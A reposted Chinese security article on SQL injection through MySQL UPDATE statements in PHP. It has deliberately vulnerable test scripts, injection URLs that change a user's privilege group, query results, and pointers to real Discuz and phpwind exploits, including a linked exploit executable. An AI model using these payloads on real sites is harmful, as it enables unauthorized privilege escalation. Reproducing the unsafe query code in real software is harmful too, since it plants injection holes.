网页功能: 加入收藏 设为首页 网站搜索  
UPDATE注射(mysql+php)的两个模式
发表日期:2006-03-12作者:HeiGe[转贴] 出处:安全焦点  

UPDATE注射(mysql+php)的两个模式
                             文/安全天使·SuperHei 2005.8.11
一.测试环境:
OS: Windowsxp sp2
php: php 4.3.10 (
mysql 4.1.9
apache 1.3.33

二.测试数据库结构:
-----start---
-- 数据库: `test`
--

-- --------------------------------------------------------

--
-- 表的结构 `userinfo`
--

CREATE TABLE `userinfo` (
  `groudid` varchar(12) NOT NULL default '1',
  `user` varchar(12) NOT NULL default 'heige',
  `pass` varchar(122) NOT NULL default '123456'
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

--
-- 导出表中的数据 `userinfo`
--

INSERT INTO `userinfo` VALUES ('2', 'heige', '123456');
------end-------

三.测试模式:
1,变量没有带''或""[MOD1]

<?php
//test1.php Mod1
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";

mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

$sql = "update userinfo set pass=$p where user='heige'";//<--$P没有使用单引号

$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);

echo "<p>SQL Query:$sql<p>";
?>

脚本里只是修改user='heige'的pass,如果groudid表示用户的权限等级,我们的目的就是通过构造$p 来达
到修改groupid的目的:

那么我们提交:http://127.0.0.1/test1.php?p=123456,groudid=1

在mysql里查询:
mysql> select * from userinfo;
+---------+-------+--------+
| groudid | user  | pass   |
+---------+-------+--------+
| 1       | heige | 123456 |
+---------+-------+--------+
1 row in set (0.01 sec)

用户heige的groudid又2改为1了 :)

所以我们可以得到没有''或"" update的注射是可以成功的,这个就是我们的模式1。

2,变量带''或""[MOD2]

<?php
//test2.php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";

mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

$sql = "update userinfo set pass='$p' where user='heige'";//<--$P使用单引号

$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);

echo "<p>SQL Query:$sql<p>";
?>

为了关闭'我们构造$p应该为123456',groudid='2 提交:
http://127.0.0.1/test2.php?p=123456',groudid='1 在gpc=on的情况下'变成了\'
提交的语句变成:SQL Query:update userinfo set pass='123456\',groudid=\'1' where user='heige'

mysql查询:
mysql> select * from userinfo;
+---------+-------+--------------------+
| groudid | user  | pass               |
+---------+-------+--------------------+
| 2       | heige | 123456',groudid='1 |
+---------+-------+--------------------+
1 row in set (0.00 sec)

groudid并没有被修改。那么在变量被''或""时 就完全没有被注射呢?不是 下面我们看模式2:

<?php
//test3.php Mod2
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";

mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

$sql = "update userinfo set pass='$p' where user='heige'";//<--$P使用单引号

$result = mysql_db_query($dbname, $sql);
mysql_fetch_array($result);    //$p的数据写入数据库

$sql= "select pass from userinfo where user='heige'";
$result = mysql_db_query($dbname, $sql);
$userinfo=mysql_fetch_array($result);

echo $userinfo[0];  //把pass查询输出给$userinfo[0]

$sql ="update userinfo set pass='$userinfo[0]' where user='heige'";
$result = mysql_db_query($dbname, $sql);
mysql_fetch_array($result); //把$userinfo[0] 再次update

?>

我们测试下,提交:http://127.0.0.1/test3.php?p=123456',groudid='1
回mysql查询下 :
mysql> select * from userinfo;
+---------+-------+--------+
| groudid | user  | pass   |
+---------+-------+--------+
| 1       | heige | 123456 |
+---------+-------+--------+
1 row in set (0.00 sec)

HaHa~~ 成功注射 修改groudid为1。 这个就是我们的模式2了,简单的描叙如下:

update-->select-->update

四.实际模式
模式1:Discuz 2.0/2.2 register.php 注射
       漏洞分析:http://4ngel.net/article/41.htm
       Discuz 2.0/2.2 register.php Remote Exploit :http://4ngel.net/project/discuz_reg.htm
模式2:phpwind 2.0.2和3.31e 权限提升漏洞
       漏洞分析:
           update (profile.php 注射变量为$proicon update语句里为,icon='$userdb[icon]')
              |
              v
           select (jop.php)
              |
              v
           updtate (jop.php)
          
       Exploit:http://www.huij.net/9xiao/up/phpwind-exploit.exe

五.鸣谢
   特别感谢saiy等朋友的讨论和帮助。Thanks!!!

我来说两句】 【加入收藏】 【返加顶部】 【打印本页】 【关闭窗口
中搜索 UPDATE注射(mysql+php)的两个模式
本类热点文章
  WordPress wp-trackback.php漏洞分析
  PHP-Nuke web中心系统中的用户登录SQL ..
  PHP-Nuke web中心系统中的用户登录SQL ..
  新浪UC ActiveX多个远程栈溢出漏洞 0-DAY
  MS06-055 XP-SP2 Exploit Challenge
  Setuid() - nproc limit 类型漏洞之深入..
  利用异常处理执行shellcode实例
  ipb search.php 漏洞分析及思考
  Microsoft Windows图形渲染引擎WMF格式..
  CCProxy 6.2溢出学习笔记
  Php5 GPC绕过缺陷
  IE mhtml redirection漏洞利用方法
最新分类信息我要发布 
最新招聘信息

关于我们 / 合作推广 / 给我留言 / 版权举报 / 意见建议 / 广告投放  
Copyright ©2003-2024 Lihuasoft.net webmaster(at)lihuasoft.net
网站编程QQ群   京ICP备05001064号 页面生成时间:0.00377